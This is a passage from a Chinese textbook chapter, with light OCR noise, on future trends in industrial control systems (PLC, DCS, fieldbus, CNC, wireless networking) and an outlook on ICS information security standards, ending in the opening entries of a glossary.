的就是生产方法的变化,这些生产方法的变革又推动了产业的变化,我们可以回顾一下工 业的发展史,从纺织工业、钢铁行业、汽车行业、化工行业、电子行业的兴起和发展可以 证明这一点,因此,我们可以毫不夸张地说,生产制造方式的改变和创新将是产业乃至工 业革命的前兆。如今,科技发展如此快速,尤其是 IT 和互联网技术已深入人类生活的方 方面面,工业设计者必须考虑如何将这些技术成功应用于生产制造行业。要解决这个问 题,也必须遵循两大原则: (1)生产制造方式的改变必须与目前制造行业的发展和未来相适应。 (2)任何一次新技术的应用必须与原来的生产、制造模式有机结合,是原来模式的继 承和发扬,是对原来模式的技术积累的再利用和突破。 从四次工业革命的发展中可以看到,由于新的科学技术成功运用于工业上,使得生产 制造模式取得变革性进步,即从单一手工业、小作坊生产成为批量简易流水线生产,再到 大批量的全自动化生产流水线,这种生产方式的改变也推动了产业的革命,不但使生产效 率、生产质量发生了天翻地覆的变化,也不断地改变了生产乃至企业的管理模式,从而引工 业控制矛息全 起了工业革命。实际上,从20世纪70年代后期自动化技术发展以后,生产的规模越来越 大,工艺越来越复杂,技术要求越来越高,在生产效率、生产质量上,人们做了不断改进 和提高。 一个大规模、大批量生产制造的模式已基本定型,但是当今社会正处于一个大发 展、大调整的变动时期,社会发展的不确定性引来了经济发展的不确定性,为了在这不确 定性的社会中始终保持企业、产业的持续发展,人们充分运用了创新创造这个武器,用技 术发展的确定性来减小经济发展的不确定性。各国不断发扬创新创造的精神来推动生产机 械制造业的持续发展,自20世纪70年代后期自动控制系统用于生产制造系统,人们也不 断地探索如何提高生产效率、如何提高生产产品、如何提高生产质量及生产的灵活性,所 以从机械制造的角度提出了机电控制一体化、管理控制一体化。在企业及生产管理上又提 出了 MES 管理和 ERP 企业管理,在生产机械设计上提出了数字工厂、虚拟工厂。同时, 为了提高生产的灵活性提出了CIMS 的概念,进行了大量试验和实践,但是所有的一切都 没有解决目前生产制造行业面临的巨大挑战,即随着 IT 技 术 、PC 技术和通信技术的飞速 发展人们对生产制造行业提出新的要求,其主要体现在以下几点: (1)生产制造产业链的全球性。 (2)生产制造形式的灵活性。 (3)企业发展的持续性。 (4)经济发展周期的缩短性。 具体而言,由于科学技术的迅猛发展,产品的生命周期越来越短,对于产品更新换代 快速响应的要求越来越高,由于生命周期的缩短使得产品批量也越来越少,产品数量的减 少又提高了成本和价格压力。更主要的是,经济周期变化的快速性要求投资回报率时间也 在缩短,同时能源使用效率、节能减排等都是我们面临的新挑战。 2. 工业发展的瓶颈和解决方法 当今,工业发展正面临着巨大的挑战,这与世界经济发展的特点有关。世界经济的发 展给工业领域的发展带来了根本性变化,产生了对生产制造布局的全球性、制造方式的灵活 性、产品生命周期的缩短和企业发展持续性的需求。在智能工厂,特别是生产制造领域就是 要产生一种新型的生产制造模式,从单纯的生产产品的技术角度来讲,这种新型的生产制造 模式要能适应产品生命周期的新变化,能够应付产品快速更新换代,产品种类多而批量少; 能够面对价格的竞争和成本的压力;能够面对投资回报时间短的压力;实现资源的优化和提 升能源效率。在过去十多年,机械制造行业的专家们做了不少努力来提高生产效率,加大生 产的灵活性,如机电一体化、管控一体化、CIMS 、 数字工厂和虚拟工厂等都没有很好地解 决以上问题。在实践和发展中,人们慢慢认识到这些问题的解决并不能单单通过改造生产 制造方式就可以实现。这种变革需要融合产品研发、生产、市场、服务、运行及回收各阶 段的动态管理,这是建设智能工厂的首要任务。因此,智能工厂应寻求解决方法。 1)灵活多样的生产制造周期 根据以上分析,实现智能工厂要分多步进行,其第一步就是要掌握产品生命周期而制 订灵活多样的生产制造发展周期。实际上,产品从诞生到消失的生命周期在市场上的销售 量需求有一定规律。它经历了研发期、试用期、发展期、成熟期、饱和期和退出期。在不同时期,市场对于产品的数量需求也是不同的,如在研发期和试用期所需要的产品数量是 有限的,而在发展期、成熟期和饱和期所需要的产品数量是由市场推广的力度及市场合理 的定位来确定的,在退出期则需要按回报率、更新换代的速度和开发新产品的投入力度来 规划产品不同的生产数量和功能。 2)适应性生产制造 多工作方法的生产制造模式是智能工厂满足客户和产品特殊需求的基础,将客户和市 场的需求及时地与生产制造模式有机地整合在 一起,及时调整生产方法来平衡成本与投 资,降低成本,提高响应速度。提高产品的竞争能力是智能工厂的基本设计思想,要实现 人工、半自动和全自动三位一体的生产制造模式,首先要考虑这种混合生产制造模式的实 施成本问题、生产方式切换时产生的停机时间问题、调试维护安装操作难度提高的问题、 运行人员的技术水平培养问题、系统规划预算的复杂性问题等。针对这些问题人们提出了 解决问题的六个方向:产品数量的响应性、生产规划的长期性、生产工艺的稳定性、技术 发展的连续性、制造成本的竞争性及员工创新的主导性。这六个方向构成了工厂智能化生 产制造模型的特征,全面系统化地确定了工厂智能化生产制造模式的设计思路。 3. 工业智能化的关键技术 早在2000年,针对生产制造模式新的发展,国际著名咨询机构 ARC 详细分析了自动 化、制造业及信息化技术发展现状,对于科学技术的发展趋势对生产制造可能产生的影响 做了全面调查,提出了多个导向性的生产自动化管理模式,指导企业制订相应的解决方 案,为用户创造更高价值。其中,从生产流程管理、企业业务管理到研究开发产品生命 周期的管理而形成的“协同制造模式”(Collaborative Manufacturing Model,CMM), 如 图12-3 所示。它将 IT 技术、工业网络技术、生产管理技术及现代自动化控制网络技术应 用于生产控制管理模式 CDAS 和 CPAS 上,解决产品生命周期的不断缩短、物流交货周期 的不断加快,以及客户定制要求的多样化问题。这种协同制造模式为制造行业的变革提出 了 一个行之有效的方法。通过将研发流程、企业管理流程与生产产业链流程有机结合起 来,形成一个协同制造流程,同时将 IT 技术和工业以太网通信网络作为协同制造系统的 信息流控制管理结构,从而使得 MRP 、ERP 、MES 的制造管理,PLMD/PLMS 产品研发 和产品服务生命周期与 CRM 客户/市场关系管理有机地融合在一个完整的企业与市场信息 闭环系统,使得企业的价值链从单一的制造环节向上游的设计研发环节发展,生产与研发 在同 一个协同平台上,企业的管理链也从上游向下游生产制造控制产业链延伸, 一个集 CRM 、PLM 、 生产、研发、控制和企业管理达成的协同制造管理系统正在形成。其基本 核心就是所谓企业管理、生产工艺价值链和产品生命周期的三轴空间的鼎立模式,它定义 了制造商、供应商乃至开发商之间的协同产业链网络结构,其关键点在于协同市场和研 发、协同研发和生产、协同管理和通信。 一个完整的制造网络由多个制造企业或参与者 组成,它们相互交换商品和信息,共同执行业务流程。企业、价值链和产品生命周期三 轴贯穿于各个制造参与者之间。居于水平面上方的是管理职能,下方是制造职能。协同 制造模式不仅要为各个独立的部门,也要为扩大化的整个企业和扩张后的整个供应链制订 解决方案。 图12- 3 协 同 制 造 模 式 (CMM) 示 意 图 移动互联网与物联网技术的不断发展,促进了工业智能化的发展。互联网将计算机进 行互联互通,实现了人与人的联网,彻底改变了人与人的互动方式。物理世界的联网,实 现信息世界与物理世界的交融,在物联网中,通过互联网实现物品的自动识别和信息的互 联与共享。在很多应用中,接入网络的设备对其计算能力的要求远非射频识别装置 (RFID) 能比。因为物联网中的物品不具备控制和自治能力,通信也大多发生在物品与服 务器之间,所以物品之间无法协同控制。为了将控制技术融入互联网,2006 年美国国家 基金会(NSF) 科学家 Helen Gild 提出了信息物理融合系统 (CPS) 的概念,将互联网技 术的发展推向了一个新的高度。CPS 把计算与通信深深地嵌入实物过程,使之与实物过程 密切互动。CPS 将物理设备联网,让物理设备具有计算、通信、精确控制、远程协调和自 治五大功能。 利用物联网的技术和设备监控技术加强信息管理和服务,清楚掌握产销流程、提高生 产过程的可控性,其核心就是通过利用互联网通信技术与网络物理系统相结合的手段,将 制造业向智能化转型,从而实现研发生产制造工艺及控制全方位的信息覆盖,全面控制各 种信息,确保各个环节都能处于最优状态。这种改革将指引各行各业朝着生产制造业智能。 方向发展。 12.1.3 工业信息化 工业信息化是指在工业生产、管理、经营过程中,通过信息基础设施,在集成平台 上,实现信息的采集、传输、处理及综合利用等。在“十五”期间,国家用信息化带动工 业化的工作重点有三个方面: 一是以电子信息技术应用为重点,提高传统产业生产过程自 动化、控制智能化和管理信息化水平;二是以先进制造技术应用为重点,推进制造业领域 的优质高效生产,振兴装备制造业;三是改造提升重点产业的关键技术、共性技术及其相 关配套技术水平、工艺和装备水平。国家实施高技术产业化的主要目标有两个: 一是发展 第12章 未来展望 高技术,形成新兴产业,培育新的增长点;二是利用先进技术改造和优化传统产业,提高 经济增长的质量。 工业信息化,从企业及生产管理上提出了 MES 管理和 ERP 管理,从生产机械设计 上提出了数字工厂、虚拟工厂。第四次工业革命提出了协同制造模式 (CMM) 和信息 物理融合系统 (CPS) 。 这些系统的迅速发展应用,预示着工业信息化已经进入一个崭新 的阶段。 由于工业信息化是加快传统产业改造升级、提高企业管理效率、提高企业整体素质、 提高国家整体国力、调整工业结构、迅速搞活大中型企业的有效途径和手段,国家将继续 通过实施一系列工业过程自动化高技术产业化专项,用信息化带动工业化,推动工业的进 一步发展,加强技术创新,实现产业化,解决国民经济发展面临的深层问题,进一步提高 国民经济整体素质和综合国力,实现跨越式发展。 12.2 工业控制系统发展趋势 计算机技术的发展,使得工业控制系统进入嵌入式智能发展阶段;全球化的生产和分 工合作,使得工业控制系统必须具备自组织的功能;互联网技术与工业自动化技术的融 合,使得工业控制系统全球互联成为可能。可以预见,未来工业控制系统的架构如图12-4 所示,工业控制自动化技术正在向智能化、网络化和集成化方向发展。 图12-4 未来工业控制系统的架构图 12.2.1 工业控制系统走向开放 工业控制系统由传统封闭式系统演变到开放式的网络系统,采用开放的硬件体系和开 放的协议体系,主要表现在以下几点。 1. 以工业 PC 为基础的低成本工业控制自动化成为主流 众所周知,从20世纪60年代开始,西方国家就依靠技术进步(新设备、新工艺及计 算机应用)开始对传统工业进行改造,使工业得到飞速发展。20 世纪末世界上最大的变 化就是全球市场的形成。全球市场导致竞争空前激烈,促使企业必须加快新产品投放市场 时 间 (Time to Market)、改 善 质 量 (Quality) 、 降 低 成 本 (Cost), 以及完善服务体系 (Service), 这就是企业的 T.Q.C.S. 。 虽然计算机集成制造系统 (CIMS) 结合信息集成和 系统集成,追求更完善的 T.Q.C.S., 使企业实现“在正确的时间,将正确的信息以正确的 方式传给正确的人,以便做出正确的决策”,即“五个正确”。然而这种自动化需要投入大 量资金,是一种高投资、高效益、高风险的发展模式,很难为大多数中小型企业所采用。 在我国,中小型企业及准大型企业走的还是低成本工业控制自动化的道路。 工业控制自动化主要包含三个层次,从下往上依次是基础自动化、过程自动化和管理 自动化,其核心是基础自动化和过程自动化。 传统的自动化系统,基础自动化部分基本被 PLC 和 DCS 垄断,过程自动化和管理自 动化部分主要由各种进口的过程计算机或小型机组成,其硬件、系统软件和应用软件的价 格之高令众多企业望而却步。 20世纪90年代以来,由于 PC-based 的工业计算机(简称工业 PC) 的发展,以工业 PC 、I/O 装置、监控装置、控制网络组成的 PC-based 自动化系统得到了迅速普及,成为 实现低成本工业自动化的重要途径。像我国重庆钢铁公司这样大企业的几乎全部大型加热 炉,也拆除了原来 DCS 或单回路数字式调节器,而改用工业 PC 来组成控制系统,并采 用模糊控制算法,获得了良好效果。 由于基于PC 的控制器被证明可以像 PLC 一样可靠,并且被操作和维护人员所接受, 所以一个接一个的制造商至少在部分生产中正在采用 PC 控制方案。基于 PC 的控制系统 易于安装和使用,有高级诊断功能,为系统集成商提供了更灵活的选择,从长远角度看, PC 控制系统维护成本低。由于可编程控制器 (PLC) 受 PC 控制的威胁最大,所以 PLC 供 应商对 PC 的应用感到很不安。事实上,他们现在也加入了PC 控制的“浪潮”中。 近十几年来,工业 PC 在我国得到了异常迅速的发展。从世界范围来看,工业 PC 主 要包含两种类型: IPC 工控机和 Compact PCI 工控机及它们的变形机,如 AT96 总线工控 机等。由于基础自动化和过程自动化对工业 PC 的运行稳定性、热插拔和冗余配置要求很 高 , 现 有 的IPC 已经不能完全满足要求,将逐渐退出该领域,取而代之的将是Compact PCI- based 工控机,而IPC 将占据管理自动化层。 十几年前,当“软 PLC” 出现时,业界曾认为工业 PC 会取代 PLC 。 然而,时至今日 工业 PC 并没有代替 PLC, 主要有两个原因: 一个是系统集成原因;另一个是软件操作系 统 Windows NT 的原因。 一个成功的 PC-based 控制系统要具备两点: 一是所有工作要由 第12章 未来展望 一个平台上的软件完成;二是向客户提供所需要的所有东西。可以预见,工业 PC 与 PLC 的竞争将主要在高端应用上,其数据复杂且设备集成度高。工业 PC 不可能与低价的微型 PLC 竞争,这也是 PLC 市场增长最快的一个原因。从发展趋势看,控制系统已经存在于 工业 PC 和 PLC 之间,这些融合的迹象已经出现。 2.PLC 在向微型化、网络化、 PC 化和开放性方向发展 长期以来, PLC 始终处于工业控制自动化领域的主战场,为各种各样的自动化控制设 备提供非常可靠的控制方案,与 DCS 和工业 PC 形成了三足鼎立之势。同时, PLC 也承 受着来自其他技术产品的冲击,尤其是工业PC 所带来的冲击。 目前,全世界 PLC 生产厂家约200家,生产300多种产品。国内 PLC 市场仍以国外 产品为主,如 Siemens 、Modicon 、A-B 、OMRON 、 三 菱 、GE 的产品。经过多年的发 展,国内PLC 生产厂家约有30家,但都没有形成颇具规模的生产能力和名牌产品,可以 说,PLC 在我国尚未形成制造产业化。在 PLC 应用方面,我国是很活跃的,应用的行业 也很广。 PLC 市场也反映了全世界制造业的状况,2000年后大幅度下滑。按照 ARC 的预测, 尽管全球经济下滑,但 PLC 市场会复苏。全球 PLC 市场在2006 年的市场总值超过83 亿美元,2011年达到120 亿美元左右。生产的快速发展带来了 PLC 产品和服务的健康 增长。 微型化、网络化、PC 化和开放性是PLC 未来发展的主要方向。在基于PLC 自动化的 早期,PLC 体积大且价格昂贵。但最近几年,微型 PLC (小于32 I/O) 已经出现,价格只 有几百欧元。随着软 PLC(Soft PLC) 控制组态软件的进一步完善和发展,安装有软 PLC 组态软件和 PC-based 控制的产品的市场份额将逐步得到增长。 当前,过程控制领域最大的发展趋势之一就是 Ethernet 技术的扩展,PLC 也不例外。 现在越来越多的 PLC 供应商开始提供 Ethernet 接口。可以相信,PLC 将继续向开放式控 制系统方向发展,尤其是基于工业PC 的控制系统。 3. 面向测控管一体化设计的 DCS 1975年,分散型控制系统 (Distributed Control System,DCS) 问世,其生产厂家主 要集中在美、日、德等国。我国从20世纪70年代中后期起,首先在大型进口设备成套中 引入国外的 DCS, 首批有化纤、乙烯、化肥等进口项目。当时,我国主要行业(如电 力、石化、建材和冶金等)的 DCS 基本全部进口。20 世纪80 年代初期在引进、消化和 吸收的同时,开始了研制国产化 DCS 的技术攻关。 近20年,特别是“九五”以来,我国 DCS 的研发和生产发展很快,崛起了一批优秀 企业,如北京和利时公司、上海新华公司、浙大中控公司、浙江威盛公司、航天测控公 司、电科院,以及北京康拓集团等。这批企业研制生产的 DCS, 不仅品种数量大幅度 增加,而且产品技术水平已经达到或接近国际先进水平。据统计,2012年中国 DCS 市 场规模为116亿元,国产 DCS 所占比重近20%。这些专业化公司不仅占据了一定的市场 份额,积累了发展的资本和技术,同时使得国外引进 DCS 的价格也大幅度下降,为我国自动化推广事业做出了贡献。与此同时,国产 DCS 的出口也在逐年增长。 虽然国产 DCS 的发展取得了长足进步,但国外 DCS 产品在国内市场中占有率还较 高,其中主要是霍尼韦尔公司(Honeywell)、 横河公司(Yokogawa)、ABB 公司和艾默生 公司 (EMERSON) 的产品。据统计,2012年中国 DCS 市场中,霍尼韦尔公司、ABB 公 司和艾默生公司所占的市场份额分别为11.8%、15.3%、13.6%。在整个 DCS 市场中,电 力、石油、化工所占的市场份额依次为31.5%、28.5%、14.5%。由于 DCS 在各行业大型 自控装置中没有可替代产品,所以其市场增长率不会下降。还有,不少企业已使用 DCS 产品15~20 年,需要更新和改造,因此今后15年内 DCS 作为自动化仪表行业主要产品 的地位不会动摇。 4. 控制系统正向现场总线 (FCS) 方向发展 由于3C(Computer,Control,Communication) 技术的发展,过程控制系统将由 DCS 发展到现场总线控制系统 (Fieldbus Control System,FCS) 。FCS 可以将 PID 控制彻底分 散到现场设备 (Field Device) 中。基于现场总线的 FCS-又是全分散、全数字化、全开放 和可互操作的新一代生产过程自动化系统,它将取代现场一对一的4~20mA 模拟信号 线,给传统的工业自动化控制系统体系结构带来革命性的变化。 根据 IEC 61158 的定义,现场总线是安装在制造或过程区域的现场装置与控制室内的 自动控制装置之间的数字式、双向传输、多分支结构的通信网络。现场总线使测控设备具 备了数字计算和数字通信能力,提高了信号的测量、传输和控制精度,提高了系统与设备 的功能和性能。IEC/TC65 的 SC65C/WG6 工作组于1984年开始致力于推出世界上单一的 现场总线标准工作,于1993年推出了 IEC 61158-2,之后的标准制定得更多。2000 年初 公布的 IEC61158 现场总线国际标准子集有以下8种。 (1)类型1IEC 技术报告 (FFH1)。 (2)类型2 Control-NET (美国 Rockwell 公司支持)。 (3)类型3 Profibus (德国Siemens 公司支持)。 (4)类型4 P-NET (丹麦 Process Data 公司支持)。 (5)类型5FFHSE ( 原FFH2) 高速以太网(美国 Fisher Rosemount公司支持)。 (6)类型6 Swift-Net (美国波音公司支持)。 (7)类型7WorldFIP (法国Alstom 公司支持)。 (8)类型8Interbus (美国 Phoenix Contact公司支持)。 除了 IEC 61158 的8种现场总线标准外, IEC TC17B 通过了3种总线标准: SDS (Smart Distributed System)、ASI(Actuator Sensor Interface)、Device NET。另外,ISO 公 布了ISO 11898 CAN标准。其中,Device NET于2002年10月8日被中国批准为国家标 准,并于2003年4月1日开始实施。 目前在各种现场总线的竞争中,以 Ethernet 为代表的 COTS(Commercial-Off-The- Shelf) 通信技术正成为现场总线发展中新的亮点。其关注的焦点主要集中在以下两个方面: (1)能否出现全世界统一的现场总线标准。 (2)现场总线系统能否全面取代现时风靡世界的 DCS。 采用现场总线技术构造低成本的现场总线控制系统,促进现场仪表的智能化、控制功 能分散化、控制系统开放化,符合工业控制系统的技术发展趋势。国家在“九五”期间为 了加快现场总线技术在我国的发展,将重点放在智能化仪表和现场总线技术的开发和工程 化上,补充和完善工艺设备、开发装置和测试装置,建立智能化仪表和开发自动化系统的 生产基地,形成适度规模经济。2000 年,“九五”国家科技攻关计划“新一代全分布式控 制系统研究与开发”和“现场总线智能仪表研究开发”两个项目相继完成。这两个项目及 先期完成的“现场总线控制系统的开发”项目,针对国际上已经出现的多种现场总线协议 并存的局面,重点选择了HART 协议和 FF 协议现场总线技术攻关。 总之,工业控制系统的发展在经历了基地式气动仪表控制系统、电动单元组合式模拟 仪表控制系统、集中式数字控制系统及集散控制系统 (DCS) 后,将朝着现场总线控制系 统 (FCS) 的方向发展。虽然以现场总线为基础的 FCS 发展很快,但 FCS 发展还有很多 工作要做,如统一标准、仪表智能化等。另外,传统控制系统的维护和改造还需要 DCS, 因此, FCS 完全取代传统 DCS 还需要一个较长的过程,同时 DCS 本身也在不断发 展与完善。可以肯定的是,结合 DCS 、工业以太网、先进控制等新技术的 FCS 将具有强 大的生命力。工业以太网,以及现场总线技术作为一种灵活、方便、可靠的数据传输方 式,在工业现场得到了越来越多的应用,并将在控制领域中占有更加重要的地位。 5. 工业控制软件正向开放性发展 自20世纪80 年代初期诞生至今,工业控制软件已有30 多年的发展历史。工业控制 软件作为一种应用软件,是随着 PC 的兴起而不断发展的。工业控制软件主要包括人机界 面软件 (HMI) 、 基于 PC 的控制软件及生产管理软件等。目前,我国已开发出一批具有 自主知识产权的实时监控软件平台、先进控制软件、过程优化控制软件等成套的应用软 件,工程化、产品化有了一定突破,打破了国外同类应用软件的垄断格局。通过在化工、 石化、造纸等行业数百个企业(装置)中的应用,促进了企业的技术改造,提高了生产过 程控制水平和产品质量,为企业创造了明显的经济效益。 作为工控软件的一个重要组成部分,国内人机界面组态软件研制方面在近几年取得了 较大进展,软件和硬件相结合,为企业测、控、管一体化提供了比较完整的解决方案。在 此基础上,工业控制软件将从人机界面和基本策略组态向先进控制方向发展。 正如第2章提到的,先进控制技术是具有比常规单回路 PID 控制更好控制效果的控制 策略统称,专门用来处理那些采用常规控制效果不好,甚至无法控制的复杂工业过程控制 问题。先进控制技术可分经典的先进控制技术、现今流行的先进控制技术和发展中的先进 控制技术三大类。 由于先进控制和优化软件可以创造巨大的经济效益,因此,这些软件也身价倍增。国 际上已经有几十家公司,推出了上百种先进控制和优化软件产品,在世界范围内形成了一 个强大的流程工业应用软件产业。因此,开发具有我国自主知识产权的先进控制和优化软 件,打破外国产品的垄断,代替进口,具有十分重要的意义。 在未来,工业控制软件将继续向标准化、网络化、智能化和开放性的方向发展。 6. 仪器仪表技术在向数字化、智能化、网络化、微型化方向发展 经过60 多年的发展,我国仪器仪表工业已有相当基础,形成了门类比较齐全的生 产、科研、营销体系。目前我国仪器仪表行业产品大多属于中低档水平,随着国际上数字 化、智能化、网络化、微型化的产品逐渐成为主流,这一差距还将进一步加大。目前,我 国高档、大型仪器设备大多依赖进口。中档产品及许多关键零部件中,国外产品占有我国 市场60%以上的份额,而国产分析仪器只占全球市场不到千分之二的份额。 7. 数控技术向智能化、开放性、网络化、信息化方向发展 自1952 年美国麻省理工学院研制出第一台试验性数控系统以来,到现在已走过了60 多年的历程。近20年来,随着计算机技术的飞速发展,各种不同层次的开放式数控系统 应运而生,发展很快,目前正朝着标准化开放体系结构的方向前进。就结构形式而言,当 今世界上的数控系统大致可分为4种类型: (1)传统数控系统, (2)“PC 嵌入NC” 结构的开放式数控系统。 (3)“NC 嵌入PC” 结构的开放式数控系统。 (4)SOFT 型开放式数控系统。 我国数控系统的开发与生产,通过“七五”引进、消化、吸收,“八五”攻关和“九 五”产业化,取得了很大的进展,基本上掌握了关键技术,建立了数控开发、生产基地, 培养了一批数控人才,初步形成了自己的数控产业,也带动了机电控制与传动控制技术的 发展。同时,具有中国特色的经济型数控系统经过这些年来的发展,其产品的性能和可靠 性有了较大提高,逐渐被用户认可。 国外数控系统技术的总体发展趋势: (1)新一代数控系统向 PC 化和开放式体系结构方向发展。 (2)驱动装置向交流、数字化方向发展。 (3)增强通信功能,向网络化发展。 (4)数控系统在控制性能上向智能化发展。 进入21 世纪,人类社会将逐步进入知识经济时代,知识将成为科技和生产发展的资 本与动力,而机床工业,作为机器制造业、工业以及整个国民经济发展的装备部门,毫无 疑问,其战略重要地位、受重视程度,也将更加鲜明突出。 2014 年,我国机床工具行业产值已跃居世界第一,并且连续10 年呈现高速增长的局 面。但与发达国家相比,我国机床数控化率还不高,2014 年生产产值数控化率还不到 55%,而发达国家大多在70%左右。由于国产数控机床不能满足市场的需求,中高档的数 控机床及配套部件只能靠进口,使我国机床的进口额呈逐年上升态势。 智能化、开放性、网络化、信息化成为未来数控系统和数控机床发展的主要趋势,具 体包括以下几点: (1)向高速、高效、高精度、高可靠性方向发展。 (2)向 PC-based 化和开放性方向发展。 (3)向模块化、智能化、柔性化、网络化和集成化方向发展。 (4)出现新一代数控加工工艺与装备,机械加工向虚拟制造的方向发展。 (5)信息技术 (IT) 与机床的结合,机电一体化先进机床将得到发展。 (6)纳米技术将形成新发展潮流,并将有新的突破。 (7)节能环保机床将加速发展,占领广大市场。 12.2.2 工业控制系统走向互联 正是由于互联网技术与工业自动化技术的融合,使得工业控制系统全球互联。过程控 制和企业信息系统的集成,使得供给链集成和企业间协同成为可能。 采用互联网及 IT 技术将生产制造、生产工艺、生产控制和生产管理结合在一起,创 造新价值的过程正在发生改变,产业链分工将被重组,充分利用物联网技术和设备监控技 术加强信息管理和服务;清楚掌握产销流程、提高生产过程的可控性、减少生产线上人工 的干预、即时正确地采集生产线数据,以及合理的生产计划编排与生产进度。集绿色、智 能等新兴技术于 一体,构建 一个高效节能、绿色环保、环境舒适的生产制造管理控制系 统,其核心是将生产系统及过程用网络化分布式生产设施来实现;同时企业管理,包括生 产物流管理、人机互动管理,以及新技术在产品开发过程中的应用,形成新产品研发生产 制造管理一体化。 12.2.3 无线技术广泛应用 工业控制网络正向有线和无线相结合的方向发展,无线技术的应用也越来越广泛。 自从1977年第 一 个民用网系统 ARCnet 投入运行以来,有线局域网以其广泛的适用 性和技术价格方面的优势,获得了成功并得到了迅速发展。然而,在工业现场, 一些工业 环境禁止、限制使用电缆或很难使用电缆,有线局域网很难发挥作用,因此,无线局域网 技术得到了发展和应用。随着微电子技术的不断发展,无线局域网技术将在工业控制网络 中发挥越来越重要的作用。 无线局域网 (Wireless LAN) 技术可以非常便捷地以无线方式连接网络设备,人们可 随时、随地、随意地访问网络资源,是现代数据通信系统发展的重要方向。无线局域网可 以在不采用网络电缆线的情况下,提供以太网互联功能。在推动网络技术发展的同时,无 线局域网也在改变着人们的生活方式。无线网通信协议通常采用 IEEE 802.3 和802. 11。 802.3 用于点对点方式,802.11 用于一 点对多点方式。无线局域网可以在普通局域网基础 上通过无线 Hub 、 无线接入站(AP) 、 无线网桥、无线 Modem 及无线网卡等来实现,其 中无线网卡使用最为普遍。无线局域网未来的研究方向主要集中在安全性、移动漫游、网 络管理及与3G 等其他移动通信系统之间的关系等问题上。 在工业自动化领域,有成千上万的感应器、检测器、计算机、PLC、 读卡器等设备, 需要互相连接形成一个控制网络,通常这些设备提供的通信接口是RS-232 或 RS-485。 无 线局域网设备使用隔离型信号转换器,将工业设备的 RS-232 串口信号与无线局域网及以 太网络信号相互转换,符合无线局域网 IEEE 802.11b 和以太网络 IEEE 802.3 标准,支持标准的 TCP/IP 网络通信协议,有效地扩展了工业设备的联网通信能力。 计算机网络技术、无线技术及智能传感器技术的结合,产生了“基于无线技术的网络 化智能传感器”的全新概念。这种基于无线技术的网络化智能传感器使得工业现场的数据 能够通过无线链路直接在网络上传输、发布和共享。无线局域网技术能够在工厂环境下为 各种智能现场设备、移动机器人及自动化设备之间的通信提供高带宽的无线数据链路和灵 活的网络拓扑结构,在一些特殊环境下有效地弥补了有线网络的不足,进一步完善了工业 控制网络的通信性能。 12.3 工业控制系统信息安全展望 在第1 章1.1.3 节曾提到,工业控制系统信息安全有全行业覆盖、日益增多和国家经 济越发达工业控制系统信息安全事件就越多的趋势。 工业数字化、智能化、信息化的发展,互联网自动化技术的应用,必将给工业控制系 统信息安全提出新的挑战。工业控制系统信息安全形势将更加严峻,更需要全球联手制定 和完善工业控制系统信息安全的标准体系,推动工业控制系统信息安全技术发展,建立工 业控制系统信息安全产品的准入机制,完善工业控制系统信息安全软件与监控,实现工业 控制系统信息安全,从而推动工业的持续发展。 12.3.1 信息安全形势更严峻 从工业发展趋势和工业控制系统发展趋势可以看出,工业控制系统信息安全将面临更 加严峻的挑战。工业信息化的普及,将使得各行各业的控制系统走向开放,工业控制系统 信息安全问题将随之而来。工业智能化的发展,互联网自动化技术进入控制系统,工业控 制系统信息安全需要进一步加强。 信息化新阶段导致网络安全的内涵不断扩展,大数据、智能化、移动互联网和云计算 等的应用,必将对工业控制系统信息安全带来更大的冲击和挑战。 12.3.2 信息安全标准体系更完善 从国际方面看, 一个工业控制系统信息安全通用标准 IEC 62443 已经建立。目前 IEC 62443 系列标准已发布8个标准,6个标准在陆续发布中。此系列标准的发布,对工 业控制系统信息安全有一个全面和完整的指导。 从国内方面看, GB/T 30976.1、GB/T 30976.2 等标准已经发布。其他工业控制系统信 息安全标准体系正在建立过程中。 12.3.3 信息安全技术快速推进 为解决工业控制系统信息安全面对的严峻挑战,国际和国内的工业控制系统信息安全 产品供应商已研制出许多产品,如工业防火墙、网闸、控制系统产品等。 面对工业控制系统信息安全面对的严峻挑战,各国也在加紧组织工业控制系统信息安 全技术的研究开发。因此,工业控制系统信息安全技术将快速推进。 12.3.4 信息安全产品准入机制 工业控制系统信息安全技术的发展,将随着工业自动化系统的发展而不断演化。目前 自动化系统发展的趋势就是数字化、智能化、网络化和人机交互人性化。同时将更多的 IT 技术应用到传统的逻辑控制和数字控制中。工业控制系统信息安全技术未来也将进一 步借助传统 IT 技术,使其更加智能化、网络化,成为控制系统不可缺少的一部分。与传 统互联网的信息安全产品研发路线类似,工业控制系统信息安全产品将在信息安全与工业 生产控制之间找到契合点,形成工业控制系统特色鲜明的安全输入、安全控制、安全输出 类产品体系。值得指出的是,随着工业控制系统信息安全认识和相关技术的不断深化,必 将产生一系列与工业控制系统功能安全、现场应用环境紧密联系,特色鲜明的工业控制系 统安全防护工具、设备及系统。 工业控制系统信息安全系统能力的等级制定和评估,必将引入工业控制系统产品的选 型要求。以美国为首的一些国家已经在新的采购中明确提出工业控制系统信息安全产品的 要求。随着工业控制系统信息安全产品认证的快速推进,工业控制系统信息安全产品的准 入机制将逐步建立。 12.3.5 信息安全软件与监控日趋完善 工业控制系统信息安全软件与监控市场纷繁复杂,需要工业控制系统供应商、网络信 息安全产品供应商和企业管控软件供应商合作开发并兼容设计,努力建立一个规范化、集 成化和完善化的信息安全软件与监控平台,实现工业控制系统信息安全的集中监控和有效 管理。 工业控制系统信息安全软件与监控需要工业控制系统供应商、网络信息安全产品供应 商和企业管控软件供应商通力合作,并不断完善,才能为工业控制系统用户提供更好的工 业控制系统信息安全解决方案。 附录A 术 语 1. 工业控制系统 (Industrial Control System/Industrial Automation and Control System) 对工业生产过程安全 (safety) 、 信息安全(security) 和可靠运行产生作用和影响的人 员、硬件和软件的集合。 2. 工业控制系统信息安全 (Industrial Control System Cyber Security) 以保护工业控制系统的可用性、完整性、保密性为目标,也包括实时性、可靠性与稳 定性。 3. 验收 (acceptance) 风险评估活动中用于结束项目实施的一种方法,主要由被评估方组织机构,对评估活 动进行逐项检验,以是否达到评估目标为接受标准。 4. 访问控制 (access control) 保护防止未经授权的访问系统资源,根据安全政策并允许唯一的授权实体(用户、程 序、过程或其他系统)管理、使用系统资源。 5. 可用性 (availability) 数据或资源的特性,被授权实体按要求能访问和使用数据或资源。 6. 鉴别 (authentication) 用于验证用户所声称的身份。验证用户身份的过程或装置通常是允许进行信息系统资 源访问的先决条件。 7. 授权用户(authorized user) 依据安全策略可以执行某项操作的用户。 8. 审计 (audit) 独立审查和记录检查,以确保遵守既定的政策和操作程序,并建议必要的控制变更。 9. 边界 (border) 